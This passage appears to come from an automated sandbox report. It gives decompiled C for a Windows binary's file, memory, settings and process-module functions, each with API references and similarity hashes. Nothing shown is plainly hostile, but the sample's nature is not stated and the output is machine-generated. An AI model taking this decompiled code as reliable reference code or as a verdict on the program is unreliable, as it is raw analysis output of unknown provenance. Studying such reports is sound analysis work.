                                                                                                                                                                    						_push(_t42); // executed
                                                                                                                                                                    						E00405E62(_t44); // executed
                                                                                                                                                                    					}
                                                                                                                                                                    					_v8 = 1;
                                                                                                                                                                    					E0040528C();
                                                                                                                                                                    					E00409C22(_t58, _t51, _t42, _a8); // executed
                                                                                                                                                                    					if( *((intOrPtr*)(_t58 + 0x3c)) > _t54) {
                                                                                                                                                                    						do {
                                                                                                                                                                    							_t34 = E00407588(_t58, _t54);
                                                                                                                                                                    							_push(_t34);
                                                                                                                                                                    							_v12 = _t34;
                                                                                                                                                                    							if( *((intOrPtr*)( *_t58 + 0x30))() == 0) {
                                                                                                                                                                    								goto L12;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_push(_a8);
                                                                                                                                                                    								_push(_v12);
                                                                                                                                                                    								_push(_t42); // executed
                                                                                                                                                                    								if( *((intOrPtr*)( *_t58 + 0x84))() == 0) {
                                                                                                                                                                    									_v8 = _v8 & 0x00000000;
                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                    									E004053B1(0, 0, 0);
                                                                                                                                                                    								} else {
                                                                                                                                                                    									goto L12;
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    							goto L15;
                                                                                                                                                                    							L12:
                                                                                                                                                                    							_t54 = _t54 + 1;
                                                                                                                                                                    						} while (_t54 <  *((intOrPtr*)(_t58 + 0x3c)));
                                                                                                                                                                    					}
                                                                                                                                                                    					L15:
                                                                                                                                                                    					E00409BE4(_a8, _t58, _t42);
                                                                                                                                                                    					if( *_a4 != 0) {
                                                                                                                                                                    						FindCloseChangeNotification(_t42); // executed
                                                                                                                                                                    					}
                                                                                                                                                                    					E004052A6();
                                                                                                                                                                    				}
                                                                                                                                                                    				return _v8;
                                                                                                                                                                    			}


















                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
                                                                                                                                                                      • Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,00000000,00000002,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,75144E00,?), ref: 0040972F
                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000000,?,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,75144E00,?), ref: 004097D2
                                                                                                                                                                      • Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                                      • Part of subcall function 004053B1: GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,75144E00,?), ref: 004053C5
                                                                                                                                                                      • Part of subcall function 004053B1: _snwprintf.MSVCRT ref: 004053F2
                                                                                                                                                                      • Part of subcall function 004053B1: MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1161345128-0
                                                                                                                                                                    • Opcode ID: 1f12c5174dbf626df3c53de546eeba79fd62534e1c6cb3d42b78c857b20e2863
                                                                                                                                                                    • Instruction ID: 16bf936c0797f0b5653ba44e3a68d79ed8c61ea338f92f09e3d7ddd4fa5d63e9
                                                                                                                                                                    • Opcode Fuzzy Hash: 1f12c5174dbf626df3c53de546eeba79fd62534e1c6cb3d42b78c857b20e2863
                                                                                                                                                                    • Instruction Fuzzy Hash: ED218F32610200EBCB24AF66CC85A5F77A8EF44764F24853BF806B72C3DA7C9D418A59
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00404689(void** __ecx, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                    				void* _t28;
                                                                                                                                                                    				void** _t29;
                                                                                                                                                                    				void* _t34;
                                                                                                                                                                    				intOrPtr _t37;
                                                                                                                                                                    				void* _t38;
                                                                                                                                                                    
                                                                                                                                                                    				_t30 = __ecx;
                                                                                                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                                                                    				_t29 = __ecx;
                                                                                                                                                                    				_v8 = 0x1388;
                                                                                                                                                                    				E00406729( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x418)) + 0xec)),  &_v16);
                                                                                                                                                                    				_t34 = _v16;
                                                                                                                                                                    				if(E00404070(_t29, _t34, _a4) == 0) {
                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t38 = _a8;
                                                                                                                                                                    					if( *(_t34 + 0x24) != 1) {
                                                                                                                                                                    						L6:
                                                                                                                                                                    						__eflags =  *(_t34 + 0x24) & 0x00000004;
                                                                                                                                                                    						if(( *(_t34 + 0x24) & 0x00000004) != 0) {
                                                                                                                                                                    							_t25 = E0040460C(_t30, _t29, _t34, _t38); // executed
                                                                                                                                                                    							goto L4;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							memcpy(_t38, _t34,  *( *((intOrPtr*)(_t29 + 0x418)) + 0xec));
                                                                                                                                                                    							_t37 = _a4;
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t28 = E0040460C(_t30, _t29, _t34, _t38);
                                                                                                                                                                    						_t44 = _t28;
                                                                                                                                                                    						if(_t28 == 0) {
                                                                                                                                                                    							goto L6;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t25 = E00404689(_t29, _t44, _t28, _t38);
                                                                                                                                                                    							L4:
                                                                                                                                                                    							_t37 = _t25;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				E00406710( &_v16);
                                                                                                                                                                    				return _t37;
                                                                                                                                                                    			}















                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
                                                                                                                                                                      • Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E
                                                                                                                                                                      • Part of subcall function 00404070: SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C
                                                                                                                                                                    • memcpy.MSVCRT ref: 0040470E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??2@??3@FilePointermemcpy
                                                                                                                                                                    • String ID: F@@
                                                                                                                                                                    • API String ID: 402491248-234039029
                                                                                                                                                                    • Opcode ID: a2a877243d3c89850b15c365e55990fc21c52ff07033efc540406eb1b4e16218
                                                                                                                                                                    • Instruction ID: c3572d9dbfcd3884a1c52f4e364fbd30e8829f125a260a26c36de24cb81dc24a
                                                                                                                                                                    • Opcode Fuzzy Hash: a2a877243d3c89850b15c365e55990fc21c52ff07033efc540406eb1b4e16218
                                                                                                                                                                    • Instruction Fuzzy Hash: 9211C4B2900114B7DB109B968844F9FBBAC9F86358F05847ABE0677282D67DA905C7EC
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                    			E0040BC51(intOrPtr* __edi, void* __eflags) {
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t10;
                                                                                                                                                                    				intOrPtr* _t13;
                                                                                                                                                                    				signed int* _t16;
                                                                                                                                                                    
                                                                                                                                                                    				_t13 = __edi;
                                                                                                                                                                    				_push( *((intOrPtr*)(__edi + 0x698)));
                                                                                                                                                                    				 *__edi = 0x410438; // executed
                                                                                                                                                                    				L0040E032(); // executed
                                                                                                                                                                    				_t11 = __edi + 0x6c4;
                                                                                                                                                                    				 *((intOrPtr*)(__edi + 0x6c4)) = 0x40f7b8;
                                                                                                                                                                    				E00403F55(_t11 + 0x54);
                                                                                                                                                                    				E00401357(_t11);
                                                                                                                                                                    				E00406355(__edi + 0x6ac);
                                                                                                                                                                    				_t16 = __edi + 0x694;
                                                                                                                                                                    				_t10 =  *_t16;
                                                                                                                                                                    				if(_t10 != 0) {
                                                                                                                                                                    					_t10 = DeleteObject(_t10);
                                                                                                                                                                    					 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                                                    				}
                                                                                                                                                                    				 *_t13 = 0x40f468;
                                                                                                                                                                    				return _t10;
                                                                                                                                                                    			}








                                                                                                                                                                    APIs
                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040BC5F
                                                                                                                                                                      • Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                                      • Part of subcall function 00406355: free.MSVCRT(00000000,004065BB,75144E00,?,00000000), ref: 0040635C
                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040BC98
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$??3@DeleteObject
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2012871476-0
                                                                                                                                                                    • Opcode ID: d09d73ff1a65a7cf09805e5a43c409f63e09c8c95696eb59a3148a3799248faa
                                                                                                                                                                    • Instruction ID: 0aef1c026dc6713788bae9d6eb068f8a37dce8dfc4f8d72ecede120d92fabf63
                                                                                                                                                                    • Opcode Fuzzy Hash: d09d73ff1a65a7cf09805e5a43c409f63e09c8c95696eb59a3148a3799248faa
                                                                                                                                                                    • Instruction Fuzzy Hash: A8F0E5711002129FDB20BF35D8806C1B7E8FF41314F10403AE85977581CB79B478CA99
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040536A(void* _a4, void* _a8) {
                                                                                                                                                                    				long _v8;
                                                                                                                                                                    				int _t8;
                                                                                                                                                                    
                                                                                                                                                                    				_t8 = WriteFile(_a4, _a8, wcslen(_a8) + _t6,  &_v8, 0); // executed
                                                                                                                                                                    				return _t8;
                                                                                                                                                                    			}





                                                                                                                                                                    0x00405386
                                                                                                                                                                    0x0040538d

                                                                                                                                                                    APIs
                                                                                                                                                                    • wcslen.MSVCRT ref: 00405377
                                                                                                                                                                    • WriteFile.KERNELBASE(?,00000003,00000000,00000001,00000000,?,?,00408878,?,00000003,?,00409C9C,?,[,?,0040977A), ref: 00405386
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWritewcslen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3657313286-0
                                                                                                                                                                    • Opcode ID: 9602672fe1690bd860651872230ab81ccb290f1b65c84329dc0bcfd5fae289e8
                                                                                                                                                                    • Instruction ID: 0c605581e95f6f9092e1dff17d412b80520820f1d5211188770866c3677ad8a7
                                                                                                                                                                    • Opcode Fuzzy Hash: 9602672fe1690bd860651872230ab81ccb290f1b65c84329dc0bcfd5fae289e8
                                                                                                                                                                    • Instruction Fuzzy Hash: 19D09271100108BFEB119B51EC06EA93BADEB00268F108035B904981A1DAB6AE559B64
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                                    			E00406729(signed int __edi, signed int* __esi) {
                                                                                                                                                                    				signed int _t4;
                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                    				signed int* _t10;
                                                                                                                                                                    
                                                                                                                                                                    				_t10 = __esi;
                                                                                                                                                                    				_t9 = __edi;
                                                                                                                                                                    				_t4 =  *__esi;
                                                                                                                                                                    				if(_t4 != 0) {
                                                                                                                                                                    					_push(_t4);
                                                                                                                                                                    					L0040E032();
                                                                                                                                                                    					 *__esi =  *__esi & 0x00000000;
                                                                                                                                                                    					__esi[1] = __esi[1] & 0x00000000;
                                                                                                                                                                    				}
                                                                                                                                                                    				_push(_t9); // executed
                                                                                                                                                                    				L0040E038(); // executed
                                                                                                                                                                    				 *_t10 = _t4;
                                                                                                                                                                    				_t10[1] = _t9;
                                                                                                                                                                    				return 1;
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??2@??3@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1936579350-0
                                                                                                                                                                    • Opcode ID: d04ff0e86415aacd890a32ca8a69411fdf4c08b78325983762dc897493c55298
                                                                                                                                                                    • Instruction ID: c90c2ba6e28998f2d5eed0bd3ccee310cae7302d4f530886d19d51dc87062eb8
                                                                                                                                                                    • Opcode Fuzzy Hash: d04ff0e86415aacd890a32ca8a69411fdf4c08b78325983762dc897493c55298
                                                                                                                                                                    • Instruction Fuzzy Hash: 1BD052B24102008BE3309F36C401726B2E8AF20726F208C2EE0D1E20C0EBB898508B18
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040623E(intOrPtr* __esi) {
                                                                                                                                                                    
                                                                                                                                                                    				free( *(__esi + 0x10)); // executed
                                                                                                                                                                    				free( *(__esi + 0xc)); // executed
                                                                                                                                                                    				 *((intOrPtr*)(__esi)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 4)) = 0;
                                                                                                                                                                    				 *(__esi + 0xc) = 0;
                                                                                                                                                                    				 *(__esi + 0x10) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x1c)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 8)) = 0;
                                                                                                                                                                    				return 0;
                                                                                                                                                                    			}




                                                                                                                                                                    APIs
                                                                                                                                                                    • free.MSVCRT(?,004064D9,75144E00,?,00000000), ref: 00406241
                                                                                                                                                                    • free.MSVCRT(?,?,004064D9,75144E00,?,00000000), ref: 00406249
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                    • Opcode ID: 76f590108307dae64c078041f874814435b3e422dbb17f3958c47c4fcdcab9e9
                                                                                                                                                                    • Instruction ID: 28e7de91d8c6fb9b9a7e9865330149758d7ef971e5f4142975db03b93ce30916
                                                                                                                                                                    • Opcode Fuzzy Hash: 76f590108307dae64c078041f874814435b3e422dbb17f3958c47c4fcdcab9e9
                                                                                                                                                                    • Instruction Fuzzy Hash: 87D042B0904B008EC7B0DF3AD401A06BBF0BB083103108D3ED0EAD2A60EB75A0149F04
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32 ref: 0040D6B5
                                                                                                                                                                      • Part of subcall function 0040D51E: memset.MSVCRT ref: 0040D53D
                                                                                                                                                                      • Part of subcall function 0040D51E: _itow.MSVCRT ref: 0040D554
                                                                                                                                                                      • Part of subcall function 0040D51E: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0040D563
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4232544981-0
                                                                                                                                                                    • Opcode ID: c8bc426b99cd421d8e6c78dc9e9d0a6f713dc6b41d52eb42d39c1684d3183b59
                                                                                                                                                                    • Instruction ID: 52ff98ee44e8e581f616b19192f74a8057abb6c9a5cdde8826008456e78d844a
                                                                                                                                                                    • Opcode Fuzzy Hash: c8bc426b99cd421d8e6c78dc9e9d0a6f713dc6b41d52eb42d39c1684d3183b59
                                                                                                                                                                    • Instruction Fuzzy Hash: E9E0B632400209BFCF126F94EC01AAA3F66FF04318F148469FD5C14561D3369574AF48
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                    			E0040D049(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				intOrPtr* _t6;
                                                                                                                                                                    				void* _t8;
                                                                                                                                                                    				struct HINSTANCE__** _t10;
                                                                                                                                                                    
                                                                                                                                                                    				_t10 = __eax;
                                                                                                                                                                    				E0040D071(__eax);
                                                                                                                                                                    				_t1 = _t10 + 0x14; // 0x8d000001
                                                                                                                                                                    				_t6 =  *_t1;
                                                                                                                                                                    				if(_t6 == 0) {
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
                                                                                                                                                                    				return _t8;
                                                                                                                                                                    			}








                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040D071: LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,751459F0,0040CF75,?,?), ref: 0040D07C
                                                                                                                                                                      • Part of subcall function 0040D071: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
                                                                                                                                                                      • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
                                                                                                                                                                      • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
                                                                                                                                                                      • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
                                                                                                                                                                      • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
                                                                                                                                                                      • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC
                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,0040CF75,00000104,0040CF75,?,?), ref: 0040D068
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$FileLibraryLoadModuleName
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3821362017-0
                                                                                                                                                                    • Opcode ID: 1cf08a23b09b0d3d97ff26b013f401c3bd3ea652a3947e7a2b393679c14be32e
                                                                                                                                                                    • Instruction ID: 2a72a0c1e2ab3da33e39831b93c2ef8746b4f49573bf5205cfb9ee226a22e14b
                                                                                                                                                                    • Opcode Fuzzy Hash: 1cf08a23b09b0d3d97ff26b013f401c3bd3ea652a3947e7a2b393679c14be32e
                                                                                                                                                                    • Instruction Fuzzy Hash: DBD02231B14300ABE330EAF08C00F4BA6D86F40B18F008C3AB189F70D0C6B4C809531A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00405E43(void* __ecx, void* _a4, void* _a8, long _a12) {
                                                                                                                                                                    				long _v8;
                                                                                                                                                                    				int _t8;
                                                                                                                                                                    
                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                    				_t8 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
                                                                                                                                                                    				return _t8;
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                    • Opcode ID: 010b72b188bcb63d068a0cd5cc08e11c66c185d99f429563d5beb6ad59adc6ad
                                                                                                                                                                    • Instruction ID: bef0590ae594767b07390076585e3b54dba5209a2ce075fea525828f997dfdeb
                                                                                                                                                                    • Opcode Fuzzy Hash: 010b72b188bcb63d068a0cd5cc08e11c66c185d99f429563d5beb6ad59adc6ad
                                                                                                                                                                    • Instruction Fuzzy Hash: B7D0C93141020DFBDF01CF80DD06FDD7B7DFB04359F104064BA10A5060D7759A14AB94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00405E62(void* __ecx, void* _a4, void* _a8, long _a12) {
                                                                                                                                                                    				long _v8;
                                                                                                                                                                    				int _t8;
                                                                                                                                                                    
                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                    				_t8 = WriteFile(_a4, _a8, _a12,  &_v8, 0); // executed
                                                                                                                                                                    				return _t8;
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,75144E00,00000000,00000000,?,?,00409760,00000000,0040FF4C,00000002,?,?,00000001,0040BE1B,0040F454), ref: 00405E79
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                    			E00406710(signed int* __ecx) {
                                                                                                                                                                    				signed int _t3;
                                                                                                                                                                    
                                                                                                                                                                    				_t3 =  *__ecx;
                                                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                                                    					_push(_t3); // executed
                                                                                                                                                                    					L0040E032(); // executed
                                                                                                                                                                    					 *__ecx =  *__ecx & 0x00000000;
                                                                                                                                                                    					__ecx[1] = __ecx[1] & 0x00000000;
                                                                                                                                                                    					return _t3;
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t3;
                                                                                                                                                                    			}





                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00405351(WCHAR* _a4) {
                                                                                                                                                                    				void* _t3;
                                                                                                                                                                    
                                                                                                                                                                    				_t3 = CreateFileW(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
                                                                                                                                                                    				return _t3;
                                                                                                                                                                    			}





                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                    • String ID:
